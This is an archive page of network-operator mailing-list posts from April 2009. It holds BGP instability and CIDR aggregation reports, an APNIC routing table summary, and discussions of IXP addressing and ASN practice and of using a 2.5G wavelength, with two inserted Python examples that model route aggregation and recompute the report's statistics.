BGP Update Report

2009-04-17 Thread cidr-report
BGP Update Report
Interval: 16-Mar-09 -to- 16-Apr-09 (32 days)
Observation Point: BGP Peering with AS131072

TOP 20 Unstable Origin AS
Rank   ASN        Upds     %   Upds/Pfx   AS-Name
 1 -   AS6389   336400  4.2%      77.1 -- BELLSOUTH-NET-BLK - BellSouth.net Inc.
 2 -   AS2386    93991  1.2%      72.4 -- INS-AS - AT&T Data Communications Services
 3 -   AS8452    87338  1.1%      61.2 -- TEDATA TEDATA
 4 -   AS6478    74423  0.9%      54.9 -- ATT-INTERNET3 - AT&T WorldNet Services
 5 -   AS29049   61885  0.8%     191.0 -- DELTA-TELECOM-AS Delta Telecom LTD.
 6 -   AS11492   59264  0.7%      48.5 -- CABLEONE - CABLE ONE, INC.
 7 -   AS12978   54276  0.7%     299.9 -- DOGAN-ONLINE Dogan Iletisim Elektronik Servis Hizmetleri AS
 8 -   AS10796   52716  0.7%      54.0 -- SCRR-10796 - Road Runner HoldCo LLC
 9 -   AS7018    51476  0.6%      34.1 -- ATT-INTERNET4 - AT&T WorldNet Services
10 -   AS19262   50870  0.6%      51.8 -- VZGNI-TRANSIT - Verizon Internet Services Inc.
11 -   AS9498    49199  0.6%      69.5 -- BBIL-AP BHARTI Airtel Ltd.
12 -   AS9829    48838  0.6%      74.3 -- BSNL-NIB National Internet Backbone
13 -   AS17488   47441  0.6%      30.5 -- HATHWAY-NET-AP Hathway IP Over Cable Internet
14 -   AS35805   44809  0.6%     138.7 -- UTG-AS United Telecom AS
15 -   AS6629    39731  0.5%     611.2 -- NOAA-AS - NOAA
16 -   AS20115   37139  0.5%      22.0 -- CHARTER-NET-HKY-NC - Charter Communications
17 -   AS4323    34658  0.4%       8.0 -- TWTC - tw telecom holdings, inc.
18 -   AS6458    33219  0.4%      83.7 -- Telgua
19 -   AS701     31261  0.4%      36.2 -- UUNET - MCI Communications Services, Inc. d/b/a Verizon Business
20 -   AS7545    31200  0.4%      37.8 -- TPG-INTERNET-AP TPG Internet Pty Ltd


TOP 20 Unstable Origin AS (Updates per announced prefix)
Rank   ASN        Upds     %   Upds/Pfx   AS-Name
 1 -   AS7717    13041  0.2%   13041.0 -- OPENIXP-AS-ID-AP OpenIXP ASN
 2 -   AS46653   17118  0.2%    5706.0 -- FREDRIKSON---BYRON - Fredrikson & Byron, P.A.
 3 -   AS14223    6661  0.1%    3330.5 -- NYSDOH - New York State Department of Health
 4 -   AS19017    2284  0.0%    2284.0 -- QUALCOMM-QWBS-LV - Qualcomm, Inc.
 5 -   AS32398   16537  0.2%    2067.1 -- REALNET-ASN-1
 6 -   AS46328   17359  0.2%    1928.8 -- PTCNEBRASKA - PIERCE TELEPHONE COMPANY, INCORPORATED
 7 -   AS5050    24762  0.3%    1904.8 -- PSC-EXT - Pittsburgh Supercomputing Center
 8 -   AS40344    1403  0.0%    1403.0 -- PROSK-1 - Pro Sky Wireless
 9 -   AS42291    6892  0.1%    1378.4 -- ISTRANET-AS Istranet LLC
10 -   AS9796     3846  0.1%    1282.0 -- WIPRO Internet Service Providers
11 -   AS47640    3751  0.1%    1250.3 -- TRICOMPAS Tricomp Sp. z. o. o.
12 -   AS34321    2339  0.0%    1169.5 -- LDK-AS Institute of strategic marks, Kiev, Ukraine
13 -   AS15045    3175  0.0%    1058.3 -- KITTELSON - KITTELSON AND ASSOCIATES, INC.
14 -   AS20925    3140  0.0%    1046.7 -- RESEAU-DANZAS DANZAS Autonomous System
15 -   AS19398    1903  0.0%     951.5 -- INDENET - Indenet.net
16 -   AS13683     870  0.0%     870.0 -- AUTO-WARES-ASN - Auto-Wares Inc
17 -   AS34996     864  0.0%     864.0 -- ANADOLUSIGORTA-AS Anadolu Sigorta AS
18 -   AS45417     857  0.0%     857.0 -- CFLINDIA-NET-IN 1-2-10, S P ROAD
19 -   AS5691    10548  0.1%     811.4 -- MITRE-AS-5 - The MITRE Corporation
20 -   AS17975   11140  0.1%     795.7 -- APT-AP AS# for peering purpose with IX and ISP.


TOP 20 Unstable Prefixes
Rank   Prefix              Upds     %   Origin AS -- AS Name
 1 -   72.23.246.0/24     24649  0.3%   AS5050  -- PSC-EXT - Pittsburgh Supercomputing Center
 2 -   199.45.13.0/24     17096  0.2%   AS46653 -- FREDRIKSON---BYRON - Fredrikson & Byron, P.A.
 3 -   41.204.2.0/24      16348  0.2%   AS32398 -- REALNET-ASN-1
 4 -   192.35.129.0/24    13238  0.2%   AS6629  -- NOAA-AS - NOAA
 5 -   198.77.177.0/24    13096  0.1%   AS6629  -- NOAA-AS - NOAA
 6 -   121.101.184.0/24   13069  0.1%   AS38785 -- BAGUSNET-AS-ID PT. BORNEO BROADBAND TECHNOLOGY
                                        AS7717  -- OPENIXP-AS-ID-AP OpenIXP ASN
 7 -   192.102.88.0/24    13056  0.1%   AS6629  -- NOAA-AS - NOAA
 8 -   222.255.51.64/26   10659  0.1%   AS7643  -- VNN-AS-AP Vietnam Posts and Telecommunications (VNPT)
 9 -   192.12.120.0/24    10423  0.1%   AS5691  -- MITRE-AS-5 - The MITRE Corporation
10 -   202.92.235.0/24     7623  0.1%   AS9498  -- BBIL-AP BHARTI Airtel Ltd.
11 -   192.135.176.0/24    6651  0.1%   AS14223 -- NYSDOH - New York State Department of Health
12 -   195.96.69.0/24      5816  0.1%   AS8225  -- ASTELIT-MSK-AS Astelit Autonomous System
13 -   202.154.60.0/22     5797  0.1%   AS4434  -- ERX-RADNET1-AS PT Rahajasa Media Internet
14 -   193.201.184.0/21    5599  0.1%   AS25546 -- BROOKLANDCOMP-AS Brookland Compute

The Cidr Report

2009-04-17 Thread cidr-report
This report has been generated at Fri Apr 17 21:14:20 2009 AEST.
The report analyses the BGP Routing Table of AS2.0 router
and generates a report on aggregation potential within the table.

Check http://www.cidr-report.org for a current version of this report.

Recent Table History
Date       Prefixes   CIDR Agg
10-04-09     291172     182326
11-04-09     291634     182060
12-04-09     291501     182042
13-04-09     291931     182023
14-04-09     291973     182186
15-04-09     291867     182331
16-04-09     291834     182793
17-04-09     292288     182981


AS Summary
 31130  Number of ASes in routing system
 13215  Number of ASes announcing only one prefix
  4304  Largest number of prefixes announced by an AS
AS6389 : BELLSOUTH-NET-BLK - BellSouth.net Inc.
  89541120  Largest address span announced by an AS (/32s)
AS27064: DDN-ASNBLK1 - DoD Network Information Center


Aggregation Summary
The algorithm used in this report proposes aggregation only
when there is a precise match using the AS path, so as 
to preserve traffic transit policies. Aggregation is also
proposed across non-advertised address space ('holes').

 --- 17Apr09 ---
AS         NetsNow  NetsAggr  NetGain  % Gain   Description

Table       292476    183014   109462   37.4%   All ASes

AS6389        4304       359     3945   91.7%   BELLSOUTH-NET-BLK - BellSouth.net Inc.
AS4323        4262      1697     2565   60.2%   TWTC - tw telecom holdings, inc.
AS209         2647      1183     1464   55.3%   ASN-QWEST - Qwest Communications Corporation
AS4766        1800       515     1285   71.4%   KIXS-AS-KR Korea Telecom
AS17488       1536       348     1188   77.3%   HATHWAY-NET-AP Hathway IP Over Cable Internet
AS22773       1049        66      983   93.7%   ASN-CXA-ALL-CCI-22773-RDC - Cox Communications Inc.
AS4755        1181       283      898   76.0%   TATACOMM-AS TATA Communications formerly VSNL is Leading ISP
AS8452        1252       357      895   71.5%   TEDATA TEDATA
AS8151        1446       570      876   60.6%   Uninet S.A. de C.V.
AS1785        1746       923      823   47.1%   AS-PAETEC-NET - PaeTec Communications, Inc.
AS19262        979       236      743   75.9%   VZGNI-TRANSIT - Verizon Internet Services Inc.
AS6478        1361       783      578   42.5%   ATT-INTERNET3 - AT&T WorldNet Services
AS855          643        76      567   88.2%   CANET-ASN-4 - Bell Aliant Regional Communications, Inc.
AS18566       1060       493      567   53.5%   COVAD - Covad Communications Co.
AS11492       1177       614      563   47.8%   CABLEONE - CABLE ONE, INC.
AS18101        753       218      535   71.0%   RIL-IDC Reliance Infocom Ltd Internet Data Centre,
AS2706         543        41      502   92.4%   HKSUPER-HK-AP Pacific Internet (Hong Kong) Limited
AS22047        611       113      498   81.5%   VTR BANDA ANCHA S.A.
AS7545         804       318      486   60.4%   TPG-INTERNET-AP TPG Internet Pty Ltd
AS17908        607       123      484   79.7%   TCISL Tata Communications
AS7018        1477      1018      459   31.1%   ATT-INTERNET4 - AT&T WorldNet Services
AS6517         720       261      459   63.8%   RELIANCEGLOBALCOM - Reliance Globalcom Services, Inc
AS4808         617       164      453   73.4%   CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network
AS4804         497        64      433   87.1%   MPX-AS Microplex PTY LTD
AS24560        682       257      425   62.3%   AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
AS17676        561       137      424   75.6%   GIGAINFRA BB TECHNOLOGY Corp.
AS7011         958       551      407   42.5%   FRONTIER-AND-CITIZENS - Frontier Communications of America, Inc.
AS4668         687       282      405   59.0%   LGNET-AS-KR LG CNS
AS4134         894       528      366   40.9%   CHINANET-BACKBONE
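The aggregation rule the report states above (propose an aggregate only where the AS path matches exactly, but allow it to span unannounced holes) can be exercised on a small constructed table. This is added example code, not the cidr-report's own tooling; the table, the AS numbers and the /8 lower bound on proposed aggregates are all assumptions made here.

```python
import ipaddress
from collections import defaultdict

MIN_PREFIXLEN = 8  # assumption: never propose an aggregate shorter than a /8

# Constructed sample routing-table entries as (prefix, AS path). Not real data:
# prefixes are RFC 5737 documentation space, AS numbers come from the
# RFC 5398 documentation range.
SAMPLE_TABLE = [
    ("192.0.2.0/25",     (64500, 64496)),
    ("192.0.2.128/25",   (64500, 64496)),  # exact sibling of the /25 above -> /24
    ("198.51.100.0/24",  (64500, 64496)),
    ("198.51.102.0/24",  (64500, 64496)),  # 198.51.101.0/24 is an unannounced hole
    ("203.0.113.0/26",   (64500, 64496)),
    ("203.0.113.128/25", (64500, 64496)),  # a /24 here would swallow AS64497's /26
    ("203.0.113.64/26",  (64500, 64497)),  # different AS path: must stay separate
]


def parse_table(rows):
    return [(ipaddress.ip_network(prefix), tuple(path)) for prefix, path in rows]


def common_supernet(a, b):
    """Smallest prefix that contains both a and b (b may sit beyond a hole)."""
    sup = a
    while not b.subnet_of(sup):
        sup = sup.supernet()
    return sup


def covers_other_path(candidate, path, table):
    """True if the candidate aggregate would cover a prefix with another AS path."""
    return any(net.overlaps(candidate) and p != path for net, p in table)


def aggregate_group(nets, path, table):
    """Merge prefixes sharing one AS path, across holes, until nothing more fits."""
    nets = set(nets)
    merged = True
    while merged:
        merged = False
        ordered = sorted(nets)
        for i, a in enumerate(ordered):
            for b in ordered[i + 1:]:
                sup = common_supernet(a, b)
                if sup.prefixlen < MIN_PREFIXLEN or covers_other_path(sup, path, table):
                    continue
                # Accept the aggregate: it replaces every prefix it contains.
                nets = {n for n in nets if not n.subnet_of(sup)}
                nets.add(sup)
                merged = True
                break
            if merged:
                break
    return nets


def aggregation_report(rows):
    """Per-AS-path and total NetsNow / NetsAggr / NetGain / % Gain, as in the report."""
    table = parse_table(rows)
    groups = defaultdict(list)
    for net, path in table:
        groups[path].append(net)
    report = {}
    for path, nets in groups.items():
        proposed = aggregate_group(nets, path, table)
        now, after = len(nets), len(proposed)
        report[path] = {"nets_now": now, "nets_aggr": after, "net_gain": now - after,
                        "pct_gain": round(100 * (now - after) / now, 1),
                        "proposed": [str(n) for n in sorted(proposed)]}
    total_now = len(table)
    total_after = sum(r["nets_aggr"] for r in report.values())
    report["ALL"] = {"nets_now": total_now, "nets_aggr": total_after,
                     "net_gain": total_now - total_after,
                     "pct_gain": round(100 * (total_now - total_after) / total_now, 1)}
    return report


if __name__ == "__main__":
    for key, row in aggregation_report(SAMPLE_TABLE).items():
        print(key, row)
```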
   

IXP

2009-04-17 Thread Sharlon R. Carty
Hello NANOG,

I would like to know what are best practices for an internet exchange. I
have some concerns about the following:
Can the IXP members use RFC 1918 ip addresses for their peering?
Can the IXP members use private autonomous numbers for their peering?

Maybe the answer is obvious, but I would like to know from any IXP admins what
their setup/experiences have been.

-- 
--sharlon


Re: IXP

2009-04-17 Thread bmanning
On Fri, Apr 17, 2009 at 10:11:30AM -0400, Sharlon R. Carty wrote:
> Hello NANOG,
> 
> I would like to know what are best practices for an internet exchange. I
> have some concerns about the following:
> Can the IXP members use RFC 1918 ip addresses for their peering?
> Can the IXP members use private autonomous numbers for their peering?
> 
> Maybe the answer is obvious, but I would like to know from any IXP admins what
> their setup/experiences have been.
> 
> -- 
> --sharlon


15 years into the exchange trade has given me the following insights:

RFC1918 space can be used - but virtually everyone who starts there
migrates to globally unique space.

Private ASNs - same deal.  Private ASNs tend to have special treatment
inside ISPs - so path matching gets you in the end.


--bill



Re: IXP

2009-04-17 Thread Elmar K. Bins
m...@sharloncarty.net (Sharlon R. Carty) wrote:

> I would like to know what are best practices for an internet exchange. I
> have some concerns about the following:
> Can the IXP members use RFC 1918 ip addresses for their peering?

No. Those IP addresses will at least appear on traceroutes; also,
it might not be such a good idea to use the same RFC1918 space
(accidentally) on different IXPs. This will get your skin crawling
(think IGP, or at least config databases)... IXPs can usually get
a v4 and a v6 block for their peering grid easily.

> Can the IXP members use private autonomous numbers for their peering?

They could, but what would you then do with them inside your IGP?
And apart from that - ISPs that want to peer tend to have their
ASNs ready...

I am not an IXP operator, but I know of no exchange (public or
private, big or closet-style) that uses private ASNs or RFC1918
space.

Elmar.



Re: IXP

2009-04-17 Thread Joe Greco
> Hello NANOG,
> 
> I would like to know what are best practices for an internet exchange. I
> have some concerns about the following:
> Can the IXP members use RFC 1918 ip addresses for their peering?
> Can the IXP members use private autonomous numbers for their peering?
> 
> Maybe the answer is obvious, but I would like to know from any IXP admins what
> their setup/experiences have been.

If you read RFC1918, the intention is to use that space within an
enterprise.  There is some wisdom there.  It is unclear why you would
want to do this, as the ARIN/etc allocation rules for an IXP are 
generally trivial.

... JG
-- 
Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net
"We call it the 'one bite at the apple' rule. Give me one chance [and] then I
won't contact you again." - Direct Marketing Ass'n position on e-mail spam(CNN)
With 24 million small businesses in the US alone, that's way too many apples.



Re: IXP

2009-04-17 Thread Alex H. Ryu
Theoretically it's doable.
But mostly no to your questions.

IXP means Internet eXchange Point.
So it is the public Internet. Why do you want to use private IP addresses?

Most RIRs allocate a /24 unit for an IXP.
For troubleshooting purposes, it is better to use public IP addresses as it
is designed.
Unless you want to have MPLS/VPN-only connections, and use private IP
addr/ASN between them.



Sharlon R. Carty wrote:
> Hello NANOG,
>
> I would like to know what are best practices for an internet exchange. I
> have some concerns about the following:
> Can the IXP members use RFC 1918 ip addresses for their peering?
> Can the IXP members use private autonomous numbers for their peering?
>
> Maybe the answer is obvious, but I would like to know from any IXP admins what
> their setup/experiences have been.
>
>   




Re: So I've got this 2.5gig wave, what do I do with it?

2009-04-17 Thread Kevin Hunt
On 4/16/09 6:34 PM, "w...@loopfree.net"  wrote:

> Due to the vagaries of telecom pricing, I've ended up with a 2.5gig
> wavelength service between two locations when what I really wanted was a
> gig-e or two.
> 
> I'm really not sure if this is a "transparent" wave service or not...
> the carrier is using gear from Ciena to hand it off to us and they seem
> to be big on transparent waves, so maybe it is, but nobody seems to be
> able to say for sure.

We use these types of circuits and I manage several others for clients.
Every time I turn one up I make sure I talk to an engineer and ask if they
are expecting a 2.5Gig signal and just going to use transponders to put my
1310nm signal into a DWDM color send it to the other side, and transponder
it back to 1310nm.  They've always said that's exactly what they are doing.

I used Cerent 15454 (now Cisco) w/ OC48 IR 1310 cards facing the wave, and
proper cross connect and Gig cards (careful here) facing my gig switches.
Shoot me an off-list message and I'll help you w/ the ins and outs and share
the costs we budget for such.
I haven't used MRV but they look appealing, would love to hear other folks'
experience with them as I'm about to have to turn another two of these up...

--

W. Kevin Hunt
CCIE #11841





Weekly Routing Table Report

2009-04-17 Thread Routing Analysis Role Account
This is an automated weekly mailing describing the state of the Internet
Routing Table as seen from APNIC's router in Japan.
Daily listings are sent to bgp-st...@lists.apnic.net

For historical data, please see http://thyme.apnic.net.

If you have any comments please contact Philip Smith .

Routing Table Report   04:00 +10GMT Sat 18 Apr, 2009

Report Website: http://thyme.apnic.net
Detailed Analysis:  http://thyme.apnic.net/current/

Analysis Summary


BGP routing table entries examined:  285512
Prefixes after maximum aggregation:  135036
Deaggregation factor:  2.11
Unique aggregates announced to Internet: 140735
Total ASes present in the Internet Routing Table: 30995
Prefixes per ASN:  9.21
Origin-only ASes present in the Internet Routing Table:   26993
Origin ASes announcing only one prefix:   13113
Transit ASes present in the Internet Routing Table:4002
Transit-only ASes present in the Internet Routing Table: 96
Average AS path length visible in the Internet Routing Table:   3.6
Max AS path length visible:  33
Max AS path prepend of ASN (43683)   31
Prefixes from unregistered ASNs in the Routing Table:   457
Unregistered ASNs in the Routing Table: 153
Number of 32-bit ASNs allocated by the RIRs:140
Prefixes from 32-bit ASNs in the Routing Table:  22
Special use prefixes present in the Routing Table:0
Prefixes being announced from unallocated address space:213
Number of addresses announced to Internet:   2032726080
Equivalent to 121 /8s, 40 /16s and 240 /24s
Percentage of available address space announced:   54.8
Percentage of allocated address space announced:   64.1
Percentage of available address space allocated:   85.5
Percentage of address space in use by end-sites:   76.4
Total number of prefixes smaller than registry allocations:  140850

APNIC Region Analysis Summary
-

Prefixes being announced by APNIC Region ASes:66222
Total APNIC prefixes after maximum aggregation:   23572
APNIC Deaggregation factor:2.81
Prefixes being announced from the APNIC address blocks:   62977
Unique aggregates announced from the APNIC address blocks:28795
APNIC Region origin ASes present in the Internet Routing Table:3598
APNIC Prefixes per ASN:   17.50
APNIC Region origin ASes announcing only one prefix:966
APNIC Region transit ASes present in the Internet Routing Table:545
Average APNIC Region AS path length visible:3.6
Max APNIC Region AS path length visible: 18
Number of APNIC addresses announced to Internet:  410974496
Equivalent to 24 /8s, 126 /16s and 249 /24s
Percentage of available APNIC address space announced: 81.7

APNIC AS Blocks4608-4864, 7467-7722, 9216-10239, 17408-18431
(pre-ERX allocations)  23552-24575, 37888-38911, 45056-46079
APNIC Address Blocks58/8,  59/8,  60/8,  61/8, 110/8, 111/8, 112/8,
   113/8, 114/8, 115/8, 116/8, 117/8, 118/8, 119/8,
   120/8, 121/8, 122/8, 123/8, 124/8, 125/8, 126/8,
   202/8, 203/8, 210/8, 211/8, 218/8, 219/8, 220/8,
   221/8, 222/8,
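The derived figures in this report (deaggregation factor, prefixes per ASN, the "/8s, /16s and /24s" breakdown and the percentage of available space announced) can be recomputed from the raw counts it prints. This is an added example, not the report's own tooling; the raw numbers are copied from the report above, while the 221 usable /8s used as the denominator for "available" IPv4 space, and the 30 APNIC /8s counted from the block list above, are assumptions.

```python
"""Recompute the derived figures of the Routing Table Report from its raw counts."""

ADDRS_PER_SLASH8, ADDRS_PER_SLASH16, ADDRS_PER_SLASH24 = 2 ** 24, 2 ** 16, 2 ** 8

# Assumption: 'available' IPv4 space = 256 /8s minus 0/8, 10/8, 127/8 and the
# 32 multicast/reserved /8s 224/8-255/8, i.e. 221 /8s.
USABLE_V4_SLASH8S = 256 - 3 - 32

# Raw counts copied from the report above.
GLOBAL = {"entries": 285512, "max_aggregated": 135036, "ases": 30995,
          "addresses": 2032726080}
APNIC = {"addresses": 410974496, "slash8s": 30}  # 30 /8s listed under APNIC Address Blocks
ARIN_ADDRESSES = 426730496


def split_into_blocks(addresses):
    """Express an address count the way the report does: /8s, then /16s, then /24s."""
    eights, rest = divmod(addresses, ADDRS_PER_SLASH8)
    sixteens, rest = divmod(rest, ADDRS_PER_SLASH16)
    twentyfours = rest // ADDRS_PER_SLASH24
    return eights, sixteens, twentyfours


def deaggregation_factor(entries, max_aggregated):
    """Prefixes in the table divided by prefixes left after maximum aggregation."""
    return round(entries / max_aggregated, 2)


def prefixes_per_asn(entries, ases):
    return round(entries / ases, 2)


def percent_announced(addresses, slash8s_available):
    """Share of an address pool (given as a number of /8s) that is announced."""
    return round(100 * addresses / (slash8s_available * ADDRS_PER_SLASH8), 1)


def summary():
    """The report's headline figures, recomputed; compare with the text above."""
    return {
        "deaggregation_factor": deaggregation_factor(GLOBAL["entries"], GLOBAL["max_aggregated"]),
        "prefixes_per_asn": prefixes_per_asn(GLOBAL["entries"], GLOBAL["ases"]),
        "global_blocks": split_into_blocks(GLOBAL["addresses"]),
        "global_pct_announced": percent_announced(GLOBAL["addresses"], USABLE_V4_SLASH8S),
        "apnic_blocks": split_into_blocks(APNIC["addresses"]),
        "apnic_pct_announced": percent_announced(APNIC["addresses"], APNIC["slash8s"]),
        "arin_blocks": split_into_blocks(ARIN_ADDRESSES),
    }


if __name__ == "__main__":
    for name, value in summary().items():
        print(f"{name}: {value}")
```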

ARIN Region Analysis Summary


Prefixes being announced by ARIN Region ASes:124873
Total ARIN prefixes after maximum aggregation:65846
ARIN Deaggregation factor: 1.90
Prefixes being announced from the ARIN address blocks:94104
Unique aggregates announced from the ARIN address blocks: 36841
ARIN Region origin ASes present in the Internet Routing Table:12932
ARIN Prefixes per ASN: 7.28
ARIN Region origin ASes announcing only one prefix:4994
ARIN Region transit ASes present in the Internet Routing Table:1253
Average ARIN Region AS path length visible: 3.3
Max ARIN Region AS path length visible:  20
Number of ARIN addresses announced to Internet:   426730496
Equivalent to 25 /8s, 111 /16s and 100 /24s
Percentage of available ARIN address space announced:  82.0

ARIN AS Blocks 1-1876, 1902-2042, 2044-2046, 2048-2106
(pre-ERX allocations)  2138-2584, 2615-2772, 2823-2829, 2880-315

RE: IXP

2009-04-17 Thread Ivan Pepelnjak
> > I would like to know what are best practices for an internet exchange.
> > I have some concerns about the following: Can the IXP members use RFC
> > 1918 ip addresses for their peering?
> 
> No. Those IP addresses will at least appear on traceroutes; also, it
> might not be such a good idea to use the same RFC1918 space
> (accidentally) on different IXPs. This will get your skin crawling
> (think IGP, or at least config databases)... IXPs can usually get a v4
> and a v6 block for their peering grid easily.

Anyone with a decently configured firewall would block IP packets with
source address from RFC1918 coming from the Internet. Your IXP would appear
as a black hole in traceroute printout because the ICMP replies sent from
the IXP IP addresses would be blocked.

A while ago I've described a few more caveats in an article (see
http://blog.ioshints.info/2008/08/private-ip-addresses-in-public-networks.ht
ml).

Ivan
 
http://www.ioshints.info/about
http://blog.ioshints.info/




RE: So I've got this 2.5gig wave, what do I do with it?

2009-04-17 Thread Eric Van Tol
> -Original Message-
> From: Kevin Hunt [mailto:kh...@huntbrothers.com]
> Sent: Friday, April 17, 2009 12:28 PM
> To: w...@loopfree.net; nanog@nanog.org
> Subject: Re: So I've got this 2.5gig wave, what do I do with it?
>

> I haven't used MRV but they look appealing, would love to hear other folks'
> experience with them as I'm about to have to turn another two of these
> up...
> 
> --

We use the MRV LambdaDrivers and they work well.  We use the EM2009-G2 on our 
own dark fiber loops and provide dual GE connectivity on a single 2.5G 
wavelength.  Equipment is pretty barebones, but quite solid.  Management module 
can be rebooted without loss of light on any interfaces (besides those 
terminated on the management module, of course).  There are plenty of options for 
SFPs wrt distances.  However, since the OP is receiving a lit signal from the 
carrier, I'm not entirely sure it will work in his case, as I *believe* the 
trunk port requires a WDM SFP, not a standard 850/1310/1550.  I could certainly 
be wrong, though.

-evt 



Re: IXP

2009-04-17 Thread Paul Vixie
with the advent of vlan tags, the whole idea of CSMA for IXP networks is passe.
just put each pair of peers into their own private tagged vlan and let one of
them allocate a V4 /30 and a V6 /64 for it.  as a bonus, this prevents third
party BGP (which nobody really liked which sometimes got turned on by mistake)
and prevents transit dumping and/or "pointing default at" someone.  the IXP no
longer needs any address space, they're just a VPN provider.  shared-switch
connections are just virtual crossconnects.
-- 
Paul Vixie



Re: IXP

2009-04-17 Thread Bill Woodcock
On Fri, 17 Apr 2009, Paul Vixie wrote:
> with the advent of vlan tags, the whole idea of CSMA for IXP networks is
> passe.
> just put each pair of peers into their own private tagged vlan.

Uh, I'm not sure whether you're being sarcastic or not.

-Bill




Re: IXP

2009-04-17 Thread Arnold Nipper
On 17.04.2009 20:52 Paul Vixie wrote

> with the advent of vlan tags, the whole idea of CSMA for IXP networks is 
> passe.
> just put each pair of peers into their own private tagged vlan and let one of
> them allocate a V4 /30 and a V6 /64 for it.  as a bonus, this prevents third
> party BGP (which nobody really liked which sometimes got turned on by mistake)
> and prevents transit dumping and/or "pointing default at" someone.  the IXP no
> longer needs any address space, they're just a VPN provider.  shared-switch
> connections are just virtual crossconnects.

Large IXPs have >300 customers. You would need up to 45k vlan tags,
wouldn't you?



Arnold
-- 
Arnold Nipper / nIPper consulting, Sandhausen, Germany
email: arn...@nipper.de   phone: +49 6224 9259 299
mobile: +49 172 2650958 fax: +49 6224 9259 333





RE: So I've got this 2.5gig wave, what do I do with it?

2009-04-17 Thread Eric Van Tol
> -Original Message-
> From: Eric Van Tol [mailto:e...@atlantech.net]
> Sent: Friday, April 17, 2009 2:44 PM
> To: nanog@nanog.org
> Subject: RE: So I've got this 2.5gig wave, what do I do with it?
> 
> > -Original Message-
> > From: Kevin Hunt [mailto:kh...@huntbrothers.com]
> > Sent: Friday, April 17, 2009 12:28 PM
> > To: w...@loopfree.net; nanog@nanog.org
> > Subject: Re: So I've got this 2.5gig wave, what do I do with it?
> >
> 
> > I haven't used MRV but they look appealing, would love to hear other
> folks'
> > experience with them as I'm about to have to turn another two of these
> > up...
> >
> > --
> 
> We use the MRV LambdaDrivers and they work well.  We use the EM2009-G2 on
> our own dark fiber loops and provide dual GE connectivity on a single 2.5G
> wavelength.  Equipment is pretty barebones, but quite solid.  Management
> module can be rebooted without loss of light on any interfaces (besides
> those terminated on the management module, of course).  There are plenty of
> options for SFPs wrt distances.  However, since the OP is receiving a lit
> signal from the carrier, I'm not entirely sure it will work in his case,
> as I *believe* the trunk port requires a WDM SFP, not a standard
> 850/1310/1550.  I could certainly be wrong, though.
> 
> -evt

Sorry to respond to my own post, but I was getting the EM2009-GM2 mixed up with 
another module we use.  We do use the EM2009-GM2, but it does not have an SFP 
trunk port - it's just a pair of SC connectors on the trunk side.  Looks like 
it can be configured for a specific wavelength by the setting of some jumpers 
on the module, and it looks like 1310 is possible.

-evt



Re: IXP

2009-04-17 Thread kris foster


On Apr 17, 2009, at 12:00 PM, Arnold Nipper wrote:

> On 17.04.2009 20:52 Paul Vixie wrote
>
>> with the advent of vlan tags, the whole idea of CSMA for IXP networks is
>> passe.
>> just put each pair of peers into their own private tagged vlan and let one of
>> them allocate a V4 /30 and a V6 /64 for it.  as a bonus, this prevents third
>> party BGP (which nobody really liked which sometimes got turned on by mistake)
>> and prevents transit dumping and/or "pointing default at" someone.  the IXP no
>> longer needs any address space, they're just a VPN provider.  shared-switch
>> connections are just virtual crossconnects.
>
> Large IXPs have >300 customers. You would need up to 45k vlan tags,
> wouldn't you?


QinQ could solve this

Kris



Re: IXP

2009-04-17 Thread Arnold Nipper
On 17.04.2009 21:04 kris foster wrote

> On Apr 17, 2009, at 12:00 PM, Arnold Nipper wrote:
> 
>> On 17.04.2009 20:52 Paul Vixie wrote
>>
>>> with the advent of vlan tags, the whole idea of CSMA for IXP  
>>> networks is passe.
>>> just put each pair of peers into their own private tagged vlan and  
>>> let one of
>>> them allocate a V4 /30 and a V6 /64 for it.  as a bonus, this  
>>> prevents third
>>> party BGP (which nobody really liked which sometimes got turned on  
>>> by mistake)
>>> and prevents transit dumping and/or "pointing default at" someone.   
>>> the IXP no
>>> longer needs any address space, they're just a VPN provider.   
>>> shared-switch
>>> connections are just virtual crossconnects.
>>
>> Large IXPs have >300 customers. You would need up to 45k vlan tags,
>> wouldn't you?
> 
> QinQ could solve this
> 

not really


-- 
Arnold Nipper / nIPper consulting, Sandhausen, Germany
email: arn...@nipper.de   phone: +49 6224 9259 299
mobile: +49 172 2650958 fax: +49 6224 9259 333





Re: IXP

2009-04-17 Thread Bill Woodcock


Sorry, hit "send" a little early, by accident.

On Apr 17, 2009, at 11:52 AM, Paul Vixie wrote:

> with the advent of vlan tags, the whole idea of CSMA for IXP networks is
> passe.
> just put each pair of peers into their own private tagged vlan.

I'm not sure whether you're being sarcastic, and if I'm not sure, I
bet people who don't know you really aren't sure.  So:  the only
nominal IXP I know of where that's really been experimented with
seriously is MYIX, in Kuala Lumpur, where it's been a notable
failure.  The other 300-and-some IXPs do things normally, with an IX
subnet that people can peer across.  So, the advent of standardized
.1Q tags in 1998, preceded by ISL for many years before that, has not
yet rendered the 99.6% majority best-practice passe.


Just a clarification.

-Bill








Re: IXP

2009-04-17 Thread Mikael Abrahamsson

On Fri, 17 Apr 2009, Arnold Nipper wrote:

> Large IXPs have >300 customers. You would need up to 45k vlan tags,
> wouldn't you?

... and exchanging multicast would be... err.. suboptimal.

--
Mikael Abrahamsson    email: swm...@swm.pp.se



Re: IXP

2009-04-17 Thread kris foster


On Apr 17, 2009, at 12:05 PM, Arnold Nipper wrote:

> On 17.04.2009 21:04 kris foster wrote
>
>> On Apr 17, 2009, at 12:00 PM, Arnold Nipper wrote:
>>
>>> On 17.04.2009 20:52 Paul Vixie wrote
>>>
>>>> with the advent of vlan tags, the whole idea of CSMA for IXP networks is
>>>> passe.
>>>> just put each pair of peers into their own private tagged vlan and let one of
>>>> them allocate a V4 /30 and a V6 /64 for it.  as a bonus, this prevents third
>>>> party BGP (which nobody really liked which sometimes got turned on by mistake)
>>>> and prevents transit dumping and/or "pointing default at" someone.  the IXP no
>>>> longer needs any address space, they're just a VPN provider.  shared-switch
>>>> connections are just virtual crossconnects.
>>>
>>> Large IXPs have >300 customers. You would need up to 45k vlan tags,
>>> wouldn't you?
>>
>> QinQ could solve this
>
> not really

painfully, with multiple circuits into the IX :) I'm not advocating
Paul's suggestion at all here


Kris



Re: IXP - PNI

2009-04-17 Thread bmanning

the vlan tagging idea is a virtualization of the PNI construct.
why use an IX when running 10's/100's/1000's of private network
interconnects will do?


granted, if out of the 120 ASN's at an IX, 100 are exchanging on
